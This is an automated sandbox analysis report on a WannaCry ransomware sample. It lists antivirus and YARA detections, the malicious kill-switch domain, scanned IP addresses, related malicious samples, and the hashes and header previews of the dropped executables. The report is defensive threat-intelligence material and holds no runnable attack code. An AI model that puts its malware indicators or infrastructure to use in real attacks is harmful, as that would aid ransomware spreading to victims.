                8.2.mssecsvc.exe.251f96c.8.unpack100%AviraTR/AD.WannaCry.sewvtDownload File
                10.0.tasksche.exe.400000.0.unpack100%AviraTR/AD.WannaCry.sewvtDownload File
                5.0.mssecsvc.exe.400000.2.unpack100%AviraTR/AD.WannaCry.sewvtDownload File
                8.2.mssecsvc.exe.1fc8084.3.unpack100%AviraTR/Ransom.GenDownload File
                7.0.mssecsvc.exe.400000.2.unpack100%AviraTR/AD.WannaCry.sewvtDownload File
                8.2.mssecsvc.exe.1fd7104.4.unpack100%AviraHEUR/AGEN.1215476Download File
                5.0.mssecsvc.exe.400000.0.unpack100%AviraTR/AD.WannaCry.sewvtDownload File
                8.0.mssecsvc.exe.7100a4.1.unpack100%AviraTR/AD.WannaCry.sewvtDownload File
                8.2.mssecsvc.exe.7100a4.1.unpack100%AviraTR/AD.WannaCry.sewvtDownload File
                7.0.mssecsvc.exe.400000.6.unpack100%AviraTR/AD.WannaCry.sewvtDownload File
                5.0.mssecsvc.exe.400000.6.unpack100%AviraTR/AD.WannaCry.sewvtDownload File
                7.0.mssecsvc.exe.7100a4.1.unpack100%AviraTR/AD.WannaCry.sewvtDownload File
                8.2.mssecsvc.exe.400000.0.unpack100%AviraTR/AD.WannaCry.sewvtDownload File
                8.2.mssecsvc.exe.24fc948.9.unpack100%AviraHEUR/AGEN.1215476Download File
                5.0.mssecsvc.exe.7100a4.3.unpack100%AviraTR/AD.WannaCry.sewvtDownload File
                9.2.tasksche.exe.400000.0.unpack100%AviraTR/AD.WannaCry.sewvtDownload File
                7.0.mssecsvc.exe.400000.4.unpack100%AviraTR/AD.WannaCry.sewvtDownload File
                7.0.mssecsvc.exe.7100a4.5.unpack100%AviraTR/AD.WannaCry.sewvtDownload File
                5.0.mssecsvc.exe.7100a4.5.unpack100%AviraTR/AD.WannaCry.sewvtDownload File
                5.2.mssecsvc.exe.400000.0.unpack100%AviraTR/AD.WannaCry.sewvtDownload File
                8.0.mssecsvc.exe.400000.0.unpack100%AviraTR/AD.WannaCry.sewvtDownload File
                7.0.mssecsvc.exe.400000.0.unpack100%AviraTR/AD.WannaCry.sewvtDownload File
                9.0.tasksche.exe.400000.0.unpack100%AviraTR/AD.WannaCry.sewvtDownload File
                5.2.mssecsvc.exe.7100a4.1.unpack100%AviraTR/AD.WannaCry.sewvtDownload File
                10.2.tasksche.exe.400000.0.unpack100%AviraTR/AD.WannaCry.sewvtDownload File
                8.2.mssecsvc.exe.1ffa128.5.unpack100%AviraTR/AD.WannaCry.sewvtDownload File
                8.2.mssecsvc.exe.24ed8c8.7.unpack100%AviraTR/Ransom.GenDownload File
                7.2.mssecsvc.exe.7100a4.1.unpack100%AviraTR/AD.WannaCry.sewvtDownload File
                5.0.mssecsvc.exe.7100a4.7.unpack100%AviraTR/AD.WannaCry.sewvtDownload File
                7.0.mssecsvc.exe.7100a4.3.unpack100%AviraTR/AD.WannaCry.sewvtDownload File
                5.0.mssecsvc.exe.400000.4.unpack100%AviraTR/AD.WannaCry.sewvtDownload File
                SourceDetectionScannerLabelLink
                www.iuqerfsodp9ifjaposdfjhgosurijfaewrwergwea.com12%VirustotalBrowse
                SourceDetectionScannerLabelLink
                http://www.iuqerfsodp9ifjaposdfjhgosurijfaewrwergwea.com100%URL Reputationmalware
                https://www.kryptoslogic.com0%URL Reputationsafe
                http://www.iuqerfsodp9ifjaposdfjhgosurijfaewrwergwea.com/100%URL Reputationmalware
                http://www.iuqerfsodp9ifjaposdfjhgosurijfaewrwergwea.comJ0%URL Reputationsafe
                http://crl.ver)0%Avira URL Cloudsafe
                http://www.iuqerfsodp9ifjapo.0%Avira URL Cloudsafe
                NameIPActiveMaliciousAntivirus DetectionReputation
                www.iuqerfsodp9ifjaposdfjhgosurijfaewrwergwea.com
                104.16.173.80
                truetrueunknown
                NameMaliciousAntivirus DetectionReputation
                http://www.iuqerfsodp9ifjaposdfjhgosurijfaewrwergwea.com/true
                • URL Reputation: malware
                unknown
                NameSourceMaliciousAntivirus DetectionReputation
                http://www.iuqerfsodp9ifjaposdfjhgosurijfaewrwergwea.commssecsvc.exe.3.drtrue
                • URL Reputation: malware
                unknown
                https://www.kryptoslogic.commssecsvc.exe, 00000005.00000002.316398385.0000000000DB6000.00000004.00000020.00020000.00000000.sdmptrue
                • URL Reputation: safe
                unknown
                http://crl.ver)svchost.exe, 0000000E.00000002.818470414.00000202ACC18000.00000004.00000020.00020000.00000000.sdmpfalse
                • Avira URL Cloud: safe
                low
                http://www.iuqerfsodp9ifjapo.mssecsvc.exe, 00000005.00000002.316368206.0000000000DAD000.00000004.00000020.00020000.00000000.sdmpfalse
                • Avira URL Cloud: safe
                unknown
                http://www.iuqerfsodp9ifjaposdfjhgosurijfaewrwergwea.comJmssecsvc.exe, 00000008.00000002.817864994.000000000019C000.00000004.00000010.00020000.00000000.sdmptrue
                • URL Reputation: safe
                unknown
                • No. of IPs < 25%
                • 25% < No. of IPs < 50%
                • 50% < No. of IPs < 75%
                • 75% < No. of IPs
                IPDomainCountryFlagASNASN NameMalicious
                15.198.96.90
                unknownUnited States
                7430TANDEMUSfalse
                102.98.236.39
                unknownMorocco
                36925ASMediMAfalse
                84.165.76.12
                unknownGermany
                3320DTAGInternetserviceprovideroperationsDEfalse
                98.2.25.221
                unknownUnited States
                11351TWC-11351-NORTHEASTUSfalse
                44.246.190.124
                unknownUnited States
                16509AMAZON-02USfalse
                84.88.23.0
                unknownSpain
                13041CESCA-ACESfalse
                184.48.114.187
                unknownUnited States
                14654WAYPORTUSfalse
                56.31.105.186
                unknownUnited States
                2686ATGS-MMD-ASUSfalse
                66.198.34.155
                unknownUnited States
                6453AS6453USfalse
                156.218.133.35
                unknownEgypt
                8452TE-ASTE-ASEGfalse
                213.151.163.163
                unknownFrance
                49594AIEFRfalse
                92.48.220.172
                unknownNetherlands
                20495WEDAREwd6NETBVNLfalse
                65.6.200.188
                unknownUnited States
                7018ATT-INTERNET4USfalse
                143.210.153.183
                unknownUnited Kingdom
                786JANETJiscServicesLimitedGBfalse
                153.85.246.31
                unknownUnited States
                14962NCR-252USfalse
                148.74.150.174
                unknownUnited States
                6128CABLE-NET-1USfalse
                146.158.112.174
                unknownCzech Republic
                50923METRO-SET-ASMetrosetAutonomousSystemRUfalse
                70.198.111.195
                unknownUnited States
                6167CELLCO-PARTUSfalse
                18.118.213.192
                unknownUnited States
                3MIT-GATEWAYSUSfalse
                63.169.16.210
                unknownUnited States
                1239SPRINTLINKUSfalse
                141.25.44.237
                unknownGermany
                680DFNVereinzurFoerderungeinesDeutschenForschungsnetzesefalse
                74.77.242.91
                unknownUnited States
                11351TWC-11351-NORTHEASTUSfalse
                83.220.90.241
                unknownRussian Federation
                31275SAMTELECOM-ASRUfalse
                35.22.150.72
                unknownUnited States
                36375UMICH-AS-5USfalse
                97.151.89.196
                unknownUnited States
                6167CELLCO-PARTUSfalse
                9.76.214.158
                unknownUnited States
                3356LEVEL3USfalse
                143.32.161.51
                unknownUnited States
                11003PANDGUSfalse
                154.166.164.126
                unknownGhana
                30986SCANCOMGHfalse
                94.95.109.37
                unknownItaly
                3269ASN-IBSNAZITfalse
                101.226.3.72
                unknownChina
                4812CHINANET-SH-APChinaTelecomGroupCNfalse
                70.230.227.11
                unknownUnited States
                7018ATT-INTERNET4USfalse
                143.80.105.145
                unknownUnited States
                8075MICROSOFT-CORP-MSN-AS-BLOCKUSfalse
                84.152.80.108
                unknownGermany
                3320DTAGInternetserviceprovideroperationsDEfalse
                4.128.195.120
                unknownUnited States
                3356LEVEL3USfalse
                97.149.114.90
                unknownUnited States
                6167CELLCO-PARTUSfalse
                83.251.185.204
                unknownSweden
                39651COMHEM-SWEDENSEfalse
                196.131.123.132
                unknownEgypt
                36935Vodafone-EGfalse
                64.230.162.31
                unknownCanada
                577BACOMCAfalse
                166.207.147.254
                unknownUnited States
                20057ATT-MOBILITY-LLC-AS20057USfalse
                75.231.248.212
                unknownUnited States
                22394CELLCOUSfalse
                143.76.10.100
                unknownUnited States
                721DNIC-ASBLK-00721-00726USfalse
                18.249.220.197
                unknownUnited States
                16509AMAZON-02USfalse
                25.60.82.196
                unknownUnited Kingdom
                7922COMCAST-7922USfalse
                193.181.98.65
                unknownSweden
                28726ASN-EVRY-UNIGRIDSEfalse
                49.175.139.192
                unknownKorea Republic of
                17858POWERVIS-AS-KRLGPOWERCOMMKRfalse
                15.17.203.127
                unknownUnited States
                13979ATT-IPFRUSfalse
                195.117.235.53
                unknownPoland
                5617TPNETPLfalse
                180.153.146.95
                unknownChina
                4812CHINANET-SH-APChinaTelecomGroupCNfalse
                87.10.96.248
                unknownItaly
                3269ASN-IBSNAZITfalse
                73.96.31.203
                unknownUnited States
                7922COMCAST-7922USfalse
                71.2.110.84
                unknownUnited States
                4282CENTURYLINK-TSDS-FLFTMYUSfalse
                40.17.88.48
                unknownUnited States
                4249LILLY-ASUSfalse
                23.148.194.3
                unknownReserved
                174COGENT-174USfalse
                97.221.108.207
                unknownUnited States
                6167CELLCO-PARTUSfalse
                189.15.27.196
                unknownBrazil
                53006ALGARTELECOMSABRfalse
                119.204.58.110
                unknownKorea Republic of
                4766KIXS-AS-KRKoreaTelecomKRfalse
                18.254.183.155
                unknownUnited States
                16509AMAZON-02USfalse
                175.111.52.216
                unknownTaiwan; Republic of China (ROC)
                18049TINP-TWTaiwanInfrastructureNetworkTechnologieTWfalse
                38.227.136.237
                unknownUnited States
                174COGENT-174USfalse
                54.43.139.62
                unknownUnited States
                14618AMAZON-AESUSfalse
                91.252.232.99
                unknownItaly
                24608WINDTRE-ASITfalse
                217.87.24.12
                unknownGermany
                3320DTAGInternetserviceprovideroperationsDEfalse
                116.172.139.56
                unknownChina
                4837CHINA169-BACKBONECHINAUNICOMChina169BackboneCNfalse
                26.33.162.67
                unknownUnited States
                7922COMCAST-7922USfalse
                26.17.55.205
                unknownUnited States
                7922COMCAST-7922USfalse
                34.78.70.213
                unknownUnited States
                15169GOOGLEUSfalse
                32.189.7.239
                unknownUnited States
                20057ATT-MOBILITY-LLC-AS20057USfalse
                173.10.40.183
                unknownUnited States
                7922COMCAST-7922USfalse
                217.245.45.172
                unknownGermany
                3320DTAGInternetserviceprovideroperationsDEfalse
                IP
                192.168.2.148
                192.168.2.149
                192.168.2.146
                192.168.2.147
                192.168.2.140
                192.168.2.141
                192.168.2.144
                192.168.2.145
                192.168.2.142
                192.168.2.143
                192.168.2.159
                192.168.2.157
                192.168.2.158
                192.168.2.151
                192.168.2.152
                192.168.2.150
                192.168.2.155
                192.168.2.156
                192.168.2.153
                192.168.2.154
                192.168.2.126
                192.168.2.127
                192.168.2.124
                192.168.2.125
                192.168.2.128
                192.168.2.129
                192.168.2.122
                192.168.2.123
                192.168.2.120
                192.168.2.121
                192.168.2.137
                Joe Sandbox Version:36.0.0 Rainbow Opal
                Analysis ID:771980
                Start date and time:2022-12-22 10:03:12 +01:00
                Joe Sandbox Product:CloudBasic
                Overall analysis duration:0h 9m 45s
                Hypervisor based Inspection enabled:false
                Report type:full
                Sample file name:mbXvGlj2dR.dll
                Cookbook file name:default.jbs
                Analysis system description:Windows 10 64 bit v1803 with Office Professional Plus 2016, Chrome 104, IE 11, Adobe Reader DC 19, Java 8 Update 211
                Number of analysed new started processes analysed:15
                Number of new started drivers analysed:0
                Number of existing processes analysed:0
                Number of existing drivers analysed:0
                Number of injected processes analysed:0
                Technologies:
                • HCA enabled
                • EGA enabled
                • HDC enabled
                • AMSI enabled
                Analysis Mode:default
                Analysis stop reason:Timeout
                Detection:MAL
                Classification:mal100.rans.troj.expl.evad.winDLL@21/5@3/100
                EGA Information:
                • Successful, ratio: 66.7%
                HDC Information:
                • Successful, ratio: 99.4% (good quality ratio 90.1%)
                • Quality average: 76.9%
                • Quality standard deviation: 32.6%
                HCA Information:Failed
                Cookbook Comments:
                • Found application associated with file extension: .dll
                • Override analysis time to 240s for rundll32
                • Exclude process from analysis (whitelisted): MpCmdRun.exe, WMIADAP.exe, conhost.exe
                • Excluded IPs from analysis (whitelisted): 209.197.3.8, 23.211.4.90
                • Excluded domains from analysis (whitelisted): client.wns.windows.com, fs.microsoft.com, e16604.g.akamaiedge.net, ctldl.windowsupdate.com, prod.fs.microsoft.com.akadns.net, fs-wildcard.microsoft.com.edgekey.net, fs-wildcard.microsoft.com.edgekey.net.globalredir.akadns.net
                • Execution Graph export aborted for target tasksche.exe, PID 3308 because there are no executed function
                • Not all processes where analyzed, report is missing behavior information
                • Report size getting too big, too many NtDeviceIoControlFile calls found.
                • Report size getting too big, too many NtQueryValueKey calls found.
                TimeTypeDescription
                10:04:09API Interceptor1x Sleep call for process: loaddll32.exe modified
                10:06:06API Interceptor2x Sleep call for process: svchost.exe modified
                No context
                MatchAssociated Sample Name / URLSHA 256DetectionLinkContext
                www.iuqerfsodp9ifjaposdfjhgosurijfaewrwergwea.com8YjgkMEKt4.exeGet hashmaliciousBrowse
                • 104.16.173.80
                w7pN61jwPu.exeGet hashmaliciousBrowse
                • 104.17.244.81
                9lCJpl7Hsk.dllGet hashmaliciousBrowse
                • 104.17.244.81
                qvV34ruRr1.exeGet hashmaliciousBrowse
                • 104.17.244.81
                GzOXKM2kuA.dllGet hashmaliciousBrowse
                • 104.17.244.81
                KIsgbS7n3c.exeGet hashmaliciousBrowse
                • 104.16.173.80
                MSNRf9dZ63.exeGet hashmaliciousBrowse
                • 104.16.173.80
                1jGr1mY0jf.exeGet hashmaliciousBrowse
                • 104.17.244.81
                RE8WkQYyxM.exeGet hashmaliciousBrowse
                • 104.16.173.80
                myGCO8gF16.exeGet hashmaliciousBrowse
                • 104.17.244.81
                lPgU0gXc07.exeGet hashmaliciousBrowse
                • 104.17.244.81
                FtslFokzJt.exeGet hashmaliciousBrowse
                • 104.16.173.80
                FnRe3LZ2g8.exeGet hashmaliciousBrowse
                • 104.16.173.80
                mUzi34RGl4.exeGet hashmaliciousBrowse
                • 104.16.173.80
                BlJkPQbfq8.exeGet hashmaliciousBrowse
                • 104.17.244.81
                fEZ8Iq7kyN.dllGet hashmaliciousBrowse
                • 104.16.173.80
                aXhkuEgYQi.exeGet hashmaliciousBrowse
                • 104.17.244.81
                nU6RI2laJn.exeGet hashmaliciousBrowse
                • 104.16.173.80
                e0R5qxY8Vj.exeGet hashmaliciousBrowse
                • 104.16.173.80
                RwsqSjIoeY.exeGet hashmaliciousBrowse
                • 104.17.244.81
                MatchAssociated Sample Name / URLSHA 256DetectionLinkContext
                TANDEMUSproforma fatura.exeGet hashmaliciousBrowse
                • 15.197.142.173
                Fatura Hk.exeGet hashmaliciousBrowse
                • 15.197.142.173
                Onaylanm#U0131#U015f beyan.exeGet hashmaliciousBrowse
                • 15.197.142.173
                AuO6RnJLdi.exeGet hashmaliciousBrowse
                • 15.197.142.173
                Ik98T0T1BR.exeGet hashmaliciousBrowse
                • 15.197.142.173
                Ysl8zZCAY0.exeGet hashmaliciousBrowse
                • 15.197.142.173
                fxzuezsuwb.exeGet hashmaliciousBrowse
                • 15.197.142.173
                MHSB7tmAIJ.exeGet hashmaliciousBrowse
                • 15.197.142.173
                3wjjsE9fZZ.exeGet hashmaliciousBrowse
                • 15.197.142.173
                jetsjest4321.exeGet hashmaliciousBrowse
                • 15.197.130.221
                jklarm7.elfGet hashmaliciousBrowse
                • 206.8.197.220
                https://larsomha-dhoufwharfful.box.com/s/hhhhch3gt4b2ifpeur9etn8iw6wdx320Get hashmaliciousBrowse
                • 15.197.142.173
                RFQ 128.exeGet hashmaliciousBrowse
                • 15.197.142.173
                QUOTATION DOC.exeGet hashmaliciousBrowse
                • 15.197.142.173
                https://fictioncontent.com/https-mybdoph/?actionGet hashmaliciousBrowse
                • 15.197.130.221
                dP69QRkel3.exeGet hashmaliciousBrowse
                • 15.197.130.221
                https://cryptodilligence.sa.com/CD/Frist%20american%20title%202022%20(2)Get hashmaliciousBrowse
                • 15.197.150.252
                Lm983MBP6y.htmlGet hashmaliciousBrowse
                • 15.197.142.173
                WL-3496 report.xlsGet hashmaliciousBrowse
                • 128.88.1.0
                Doc 0211.xlsGet hashmaliciousBrowse
                • 128.88.1.0
                ASMediMA3AnYui60gb.elfGet hashmaliciousBrowse
                • 197.153.36.38
                gL5vZH3AvK.elfGet hashmaliciousBrowse
                • 197.247.53.18
                heCWccXzMA.elfGet hashmaliciousBrowse
                • 197.153.24.37
                4t5dine8c7.elfGet hashmaliciousBrowse
                • 197.153.61.67
                3vdX34ASp2.elfGet hashmaliciousBrowse
                • 197.153.61.56
                0CW25zK8iU.elfGet hashmaliciousBrowse
                • 197.253.190.197
                CqTq62KCaq.elfGet hashmaliciousBrowse
                • 197.153.36.24
                bAbNapBrPT.elfGet hashmaliciousBrowse
                • 197.153.36.7
                sTwjz3f1Re.elfGet hashmaliciousBrowse
                • 197.247.118.98
                spzG7nKtuJ.elfGet hashmaliciousBrowse
                • 197.153.97.33
                eaJ6Y5hf9O.elfGet hashmaliciousBrowse
                • 197.153.97.37
                t1qflpucFu.elfGet hashmaliciousBrowse
                • 197.153.24.56
                pLqTyUTJIE.elfGet hashmaliciousBrowse
                • 197.153.24.71
                WbsOLxw0tv.elfGet hashmaliciousBrowse
                • 196.120.221.191
                rWS6ozMwsq.elfGet hashmaliciousBrowse
                • 197.247.143.15
                2iFcgjKJQo.elfGet hashmaliciousBrowse
                • 197.153.119.220
                IyUil7L22U.elfGet hashmaliciousBrowse
                • 197.153.36.45
                r2PdOoSOt5.elfGet hashmaliciousBrowse
                • 41.92.113.61
                rEf22zNs0R.elfGet hashmaliciousBrowse
                • 197.247.28.24
                JBw4zA9jb6.elfGet hashmaliciousBrowse
                • 197.153.12.33
                MatchAssociated Sample Name / URLSHA 256DetectionLinkContext
                3b5074b1b5d032e5620f69f9f700ff0eConfirm Balance Payment_cln.exeGet hashmaliciousBrowse
                • 20.90.153.243
                • 20.90.152.133
                • 20.90.156.32
                file.exeGet hashmaliciousBrowse
                • 20.90.153.243
                • 20.90.152.133
                • 20.90.156.32
                PI_KPCPU_231(MECH)NBI-pdf.exeGet hashmaliciousBrowse
                • 20.90.153.243
                • 20.90.152.133
                • 20.90.156.32
                file.exeGet hashmaliciousBrowse
                • 20.90.153.243
                • 20.90.152.133
                • 20.90.156.32
                epTZLp5PyVs2lsz.exeGet hashmaliciousBrowse
                • 20.90.153.243
                • 20.90.152.133
                • 20.90.156.32
                SecuriteInfo.com.Variant.MSILHeracles.52255.25559.25166.exeGet hashmaliciousBrowse
                • 20.90.153.243
                • 20.90.152.133
                • 20.90.156.32
                XXXX.wav.HTMGet hashmaliciousBrowse
                • 20.90.153.243
                • 20.90.152.133
                • 20.90.156.32
                DHL 486687933XTL.exeGet hashmaliciousBrowse
                • 20.90.153.243
                • 20.90.152.133
                • 20.90.156.32
                3zEy98Fupc.exeGet hashmaliciousBrowse
                • 20.90.153.243
                • 20.90.152.133
                • 20.90.156.32
                v5IO7K2kS5.exeGet hashmaliciousBrowse
                • 20.90.153.243
                • 20.90.152.133
                • 20.90.156.32
                KlFJKRgNa6.exeGet hashmaliciousBrowse
                • 20.90.153.243
                • 20.90.152.133
                • 20.90.156.32
                FDZW6tkTPQ.exeGet hashmaliciousBrowse
                • 20.90.153.243
                • 20.90.152.133
                • 20.90.156.32
                J6QUoD7gif.exeGet hashmaliciousBrowse
                • 20.90.153.243
                • 20.90.152.133
                • 20.90.156.32
                2tK9DovsB2.exeGet hashmaliciousBrowse
                • 20.90.153.243
                • 20.90.152.133
                • 20.90.156.32
                UaFlmnCC8c.exeGet hashmaliciousBrowse
                • 20.90.153.243
                • 20.90.152.133
                • 20.90.156.32
                ix2mYt2NSH.exeGet hashmaliciousBrowse
                • 20.90.153.243
                • 20.90.152.133
                • 20.90.156.32
                7Ga5u4um3M.exeGet hashmaliciousBrowse
                • 20.90.153.243
                • 20.90.152.133
                • 20.90.156.32
                6Af0SonEC3ndbVo.exeGet hashmaliciousBrowse
                • 20.90.153.243
                • 20.90.152.133
                • 20.90.156.32
                ZNInv_39422216.vbsGet hashmaliciousBrowse
                • 20.90.153.243
                • 20.90.152.133
                • 20.90.156.32
                https://gradiaf-france.org/ri/index.php?RRERO=4Get hashmaliciousBrowse
                • 20.90.153.243
                • 20.90.152.133
                • 20.90.156.32
                MatchAssociated Sample Name / URLSHA 256DetectionLinkContext
                C:\WINDOWS\qeriuwjhrf (copy)MSNRf9dZ63.exeGet hashmaliciousBrowse
                  7Qu8thR7WW.dllGet hashmaliciousBrowse
                    MSmReFKunQ.dllGet hashmaliciousBrowse
                      kXpnLUmuU2.dllGet hashmaliciousBrowse
                        TigrxMihsc.dllGet hashmaliciousBrowse
                          iTQzi9bir4.dllGet hashmaliciousBrowse
                            5nuyzrvshp.dllGet hashmaliciousBrowse
                              JJuyd5UnAs.dllGet hashmaliciousBrowse
                                OiE7MtX6tI.dllGet hashmaliciousBrowse
                                  FFrKRs5Q7y.dllGet hashmaliciousBrowse
                                    rQJydZ0McE.dllGet hashmaliciousBrowse
                                      svRn7r2Rty.dllGet hashmaliciousBrowse
                                        O9KOr4E9LK.dllGet hashmaliciousBrowse
                                          rvmsgjuGfo.dllGet hashmaliciousBrowse
                                            ovoq6aoWTi.dllGet hashmaliciousBrowse
                                              fxyKXb2hV5.dllGet hashmaliciousBrowse
                                                YsoENGep0M.dllGet hashmaliciousBrowse
                                                  oap4r2jjhD.dllGet hashmaliciousBrowse
                                                    11HRaPgStk.dllGet hashmaliciousBrowse
                                                      yP3DHwa4lC.dllGet hashmaliciousBrowse
                                                        Process:C:\Windows\System32\svchost.exe
                                                        File Type:Extensible storage engine DataBase, version 0x620, checksum 0xb99d4cd4, page size 16384, DirtyShutdown, Windows version 10.0
                                                        Category:dropped
                                                        Size (bytes):786432
                                                        Entropy (8bit):0.2507038694127294
                                                        Encrypted:false
                                                        SSDEEP:384:4PN+W0StseCJ48EApW0StseCJ48E2rTSjlK/ebmLerYSRSY1J2:4PuSB2nSB2RSjlK/+mLesOj1J2
                                                        MD5:4F4CCE740479F6B640373C92CCBA102F
                                                        SHA1:966B933719006A0905218809CEB60E237C727251
                                                        SHA-256:9013B3D868BA52EE5CAE88672DB34024A9990B2107DFFAF0E397A30289E75058
                                                        SHA-512:11E274B778ACB613025D978728560F0A84CD9A5602E614FA68032AAA9BF744AD64CD12ABB3F86786763E43B65629FBB83149B6C5454AE193199275E1949B230D
                                                        Malicious:false
                                                        Preview:..L.... ................e.f.3...w........................).....8....z.......z..h.+..............................3...w...........................................................................................................B...........@...................................................................................................... ........3...w......................................................................................................................................................................................................................................>........z...................i@......z..........................................................................................................................................................................................................................................................................................................................................................................................
                                                        Process:C:\Windows\mssecsvc.exe
                                                        File Type:PE32 executable (GUI) Intel 80386, for MS Windows
                                                        Category:dropped
                                                        Size (bytes):3514368
                                                        Entropy (8bit):7.996072890929898
                                                        Encrypted:true
                                                        SSDEEP:98304:QqPoBhz1aRxcSUDk36SAEdhvxWa9P593R8yAVp2Hj:QqPe1Cxcxk3ZAEUadzR8yc4Hj
                                                        MD5:7F7CCAA16FB15EB1C7399D422F8363E8
                                                        SHA1:BD44D0AB543BF814D93B719C24E90D8DD7111234
                                                        SHA-256:2584E1521065E45EC3C17767C065429038FC6291C091097EA8B22C8A502C41DD
                                                        SHA-512:83E334B80DE08903CFA9891A3FA349C1ECE7E19F8E62B74A017512FA9A7989A0FD31929BF1FC13847BEE04F2DA3DACF6BC3F5EE58F0E4B9D495F4B9AF12ED2B7
                                                        Malicious:true
                                                        Antivirus:
                                                        • Antivirus: ReversingLabs, Detection: 98%
                                                        Joe Sandbox View:
                                                        • Filename: MSNRf9dZ63.exe, Detection: malicious, Browse
                                                        • Filename: 7Qu8thR7WW.dll, Detection: malicious, Browse
                                                        • Filename: MSmReFKunQ.dll, Detection: malicious, Browse
                                                        • Filename: kXpnLUmuU2.dll, Detection: malicious, Browse
                                                        • Filename: TigrxMihsc.dll, Detection: malicious, Browse
                                                        • Filename: iTQzi9bir4.dll, Detection: malicious, Browse
                                                        • Filename: 5nuyzrvshp.dll, Detection: malicious, Browse
                                                        • Filename: JJuyd5UnAs.dll, Detection: malicious, Browse
                                                        • Filename: OiE7MtX6tI.dll, Detection: malicious, Browse
                                                        • Filename: FFrKRs5Q7y.dll, Detection: malicious, Browse
                                                        • Filename: rQJydZ0McE.dll, Detection: malicious, Browse
                                                        • Filename: svRn7r2Rty.dll, Detection: malicious, Browse
                                                        • Filename: O9KOr4E9LK.dll, Detection: malicious, Browse
                                                        • Filename: rvmsgjuGfo.dll, Detection: malicious, Browse
                                                        • Filename: ovoq6aoWTi.dll, Detection: malicious, Browse
                                                        • Filename: fxyKXb2hV5.dll, Detection: malicious, Browse
                                                        • Filename: YsoENGep0M.dll, Detection: malicious, Browse
                                                        • Filename: oap4r2jjhD.dll, Detection: malicious, Browse
                                                        • Filename: 11HRaPgStk.dll, Detection: malicious, Browse
                                                        • Filename: yP3DHwa4lC.dll, Detection: malicious, Browse
                                                        Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.........:..T...T...T..X...T.._...T.'.Z...T..^...T..P...T.g.....T...U...T..._...T.c.R...T.Rich..T.........................PE..L...A..L.................p... 5......w............@...........................5.................................................d.........4..........................................................................................................text....i.......p.................. ..`.rdata..p_.......`..................@..@.data...X........ ..................@....rsrc.....4.......4.................@..@........................................................................................................................................................................................................................................................................................................................................................
                                                        Process:C:\Windows\System32\svchost.exe
                                                        File Type:JSON data
                                                        Category:dropped
                                                        Size (bytes):55
                                                        Entropy (8bit):4.306461250274409
                                                        Encrypted:false
                                                        SSDEEP:3:YDQRWu83XfAw2fHbY:YMRl83Xt2f7Y
                                                        MD5:DCA83F08D448911A14C22EBCACC5AD57
                                                        SHA1:91270525521B7FE0D986DB19747F47D34B6318AD
                                                        SHA-256:2B4B2D4A06044AD0BD2AE3287CFCBECD90B959FEB2F503AC258D7C0A235D6FE9
                                                        SHA-512:96F3A02DC4AE302A30A376FC7082002065C7A35ECB74573DE66254EFD701E8FD9E9D867A2C8ABEB4C482738291B715D4965A0D2412663FDF1EE6CBC0BA9FBACA
                                                        Malicious:false
                                                        Preview:{"fontSetUri":"fontset-2017-04.json","baseUri":"fonts"}
                                                        Process:C:\Windows\SysWOW64\rundll32.exe
                                                        File Type:PE32 executable (GUI) Intel 80386, for MS Windows
                                                        Category:dropped
                                                        Size (bytes):3723264
                                                        Entropy (8bit):7.965905243891064
                                                        Encrypted:false
                                                        SSDEEP:98304:yDqPoBhz1aRxcSUDk36SAEdhvxWa9P593R8yAVp2HI:yDqPe1Cxcxk3ZAEUadzR8yc4HI
                                                        MD5:0C694193CEAC8BFB016491FFB534EB7C
                                                        SHA1:3AFA73283D1E17DE1BDE6CC14E19417E70FC9554
                                                        SHA-256:DBF3890B782AC04136C3336814EEF97E3C0F4133F9592E882C131C179161B27B
                                                        SHA-512:BFA729E9449C0A438CFB51FC9F4314022B2F18092938FD42702A06246EDC865DB77327399A8D21CC1FA208A99E3436E4A460CB010E428CADDC638C3FA6547AFB
                                                        Malicious:true
                                                        Yara Hits:
                                                        • Rule: WannaCry_Ransomware, Description: Detects WannaCry Ransomware, Source: C:\Windows\mssecsvc.exe, Author: Florian Roth (with the help of binar.ly)
                                                        • Rule: WannaCry_Ransomware_Gen, Description: Detects WannaCry Ransomware, Source: C:\Windows\mssecsvc.exe, Author: Florian Roth (based on rule by US CERT)
                                                        • Rule: JoeSecurity_Wannacry, Description: Yara detected Wannacry ransomware, Source: C:\Windows\mssecsvc.exe, Author: Joe Security
                                                        • Rule: wanna_cry_ransomware_generic, Description: detects wannacry ransomware on disk and in virtual page, Source: C:\Windows\mssecsvc.exe, Author: us-cert code analysis team
                                                        • Rule: Win32_Ransomware_WannaCry, Description: unknown, Source: C:\Windows\mssecsvc.exe, Author: ReversingLabs
                                                        Antivirus:
                                                        • Antivirus: Avira, Detection: 100%
                                                        • Antivirus: Joe Sandbox ML, Detection: 100%
                                                        • Antivirus: ReversingLabs, Detection: 95%
                                                        Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......U<S..]=..]=..]=.jA1..]=.A3..]=.~B7..]=.~B6..]=.~B9..]=..R`..]=..]<.J]=.'{6..]=..[;..]=.Rich.]=.........................PE..L.....L.....................08...................@...........................f......................................................1.T.5..........................................................................................................text.............................. ..`.rdata..............................@..@.data....H0......p..................@....rsrc...T.5...1...5.. ..............@..@........................................................................................................................................................................................................................................................................................................................................................
                                                        Process:C:\Windows\mssecsvc.exe
                                                        File Type:PE32 executable (GUI) Intel 80386, for MS Windows
                                                        Category:dropped
                                                        Size (bytes):3514368
                                                        Entropy (8bit):7.996072890929898
                                                        Encrypted:true
                                                        SSDEEP:98304:QqPoBhz1aRxcSUDk36SAEdhvxWa9P593R8yAVp2Hj:QqPe1Cxcxk3ZAEUadzR8yc4Hj
                                                        MD5:7F7CCAA16FB15EB1C7399D422F8363E8
                                                        SHA1:BD44D0AB543BF814D93B719C24E90D8DD7111234
                                                        SHA-256:2584E1521065E45EC3C17767C065429038FC6291C091097EA8B22C8A502C41DD
                                                        SHA-512:83E334B80DE08903CFA9891A3FA349C1ECE7E19F8E62B74A017512FA9A7989A0FD31929BF1FC13847BEE04F2DA3DACF6BC3F5EE58F0E4B9D495F4B9AF12ED2B7
                                                        Malicious:true
                                                        Yara Hits:
                                                        • Rule: WannaCry_Ransomware, Description: Detects WannaCry Ransomware, Source: C:\Windows\tasksche.exe, Author: Florian Roth (with the help of binar.ly)
                                                        • Rule: JoeSecurity_Wannacry, Description: Yara detected Wannacry ransomware, Source: C:\Windows\tasksche.exe, Author: Joe Security
